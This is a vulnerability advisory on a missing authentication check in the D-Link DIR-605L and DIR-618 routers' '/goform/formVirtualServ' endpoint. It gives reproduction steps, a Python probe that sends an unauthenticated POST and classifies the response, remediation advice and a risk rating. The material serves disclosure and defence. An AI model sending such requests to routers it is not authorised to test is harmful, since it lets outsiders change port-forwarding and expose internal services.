D-Link DIR-605L and DIR-618 Improper Access Control Vulnerability

Vulnerability

An improper access control vulnerability has been identified in the D-Link DIR-605L and DIR-618 routers, firmware versions 2.02 and 3.02. The web management interface handles requests to '/goform/formVirtualServ' without verifying that the requester is authenticated, so anyone who can reach the interface can change the router's virtual server (port-forwarding) settings by sending a crafted HTTP POST request. No credentials are required; the attack is carried out from the local network.

Impact

Exploitation of this vulnerability lets an unauthenticated user change the virtual server settings on the affected router. Because these settings control which internal hosts and ports are forwarded from the outside, an attacker can expose internal services that were never meant to be reachable, break existing forwarding rules, or otherwise misconfigure the device.

Reproduction

To reproduce this vulnerability, send an HTTP POST request to the '/goform/formVirtualServ' endpoint with no session cookie or other credentials, carrying the virtual server settings as form-encoded fields in the request body (the same fields the web UI's virtual server page submits). If the router applies the settings instead of redirecting to the login page or rejecting the request, the access check is missing. The request can be sent with curl or Postman, or with a short script that automates the check.
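The check described above, written out as an added example (this is not D-Link's code and not part of the original advisory). It sends one POST to the endpoint with no Cookie or Authorization header and classifies the response. The body is deliberately left empty so that the probe does not write a forwarding rule; whether the firmware accepts an empty body is an assumption, as are the response heuristics (401/403, a redirect to a login page, or a page carrying login-form markers all count as "authentication enforced"). The host, port and marker strings are placeholders.

```python
"""Probe whether /goform/formVirtualServ is reachable without authentication.

Added example, not vendor code. Assumptions: an empty form body is harmless,
and the response patterns below reliably distinguish an enforced login from
an accepted request on this firmware.
"""
import http.client
import urllib.parse

ENDPOINT = "/goform/formVirtualServ"
# Assumed markers of a login page being served instead of the form handler.
LOGIN_MARKERS = (b"login", b"password", b"log in")
REDIRECT_CODES = (301, 302, 303, 307, 308)


def classify(status, headers, body):
    """Map an HTTP response to a verdict on whether the endpoint checked auth.

    Returns one of 'auth_enforced', 'accepted_unauthenticated', 'inconclusive'.
    """
    hdrs = {k.lower(): v for k, v in headers.items()}  # case-insensitive lookup
    if status in (401, 403):
        return "auth_enforced"
    if status in REDIRECT_CODES and "login" in hdrs.get("location", "").lower():
        return "auth_enforced"
    if status == 200:
        lowered = body.lower()
        if any(marker in lowered for marker in LOGIN_MARKERS):
            # Handler answered 200 but served the login page: check is in place.
            return "auth_enforced"
        # 200 with no login page: the form handler ran for an unauthenticated caller.
        return "accepted_unauthenticated"
    return "inconclusive"


def probe(host, port=80, fields=None, timeout=5):
    """Send the unauthenticated POST and return the verdict from classify().

    `fields` is an optional dict of form fields; by default the body is empty
    so the probe does not change configuration.
    """
    body = urllib.parse.urlencode(fields or {})
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    # No Cookie and no Authorization header: this is the point of the test.
    conn.request(
        "POST",
        ENDPOINT,
        body=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return classify(resp.status, dict(resp.getheaders()), data)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"  # placeholder
    print(target, ENDPOINT, probe(target))
```

Run it against a lab router only; even with an empty body, an unpatched device may still process the request. A verdict of "accepted_unauthenticated" on the affected firmware confirms the missing check; "inconclusive" means the heuristics did not match and the raw response should be inspected by hand.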

Remediation

Check D-Link for a firmware update for the affected models and apply it if one is available. Until the access check is fixed, restrict access to the router's web management interface to trusted hosts with firewall rules, disable remote (WAN-side) management, keep untrusted devices off the network segment that can reach the interface, and review the virtual server table for forwarding rules that were not created by an administrator.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 5.7
impact: 0.6
exploitability: 6.2
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.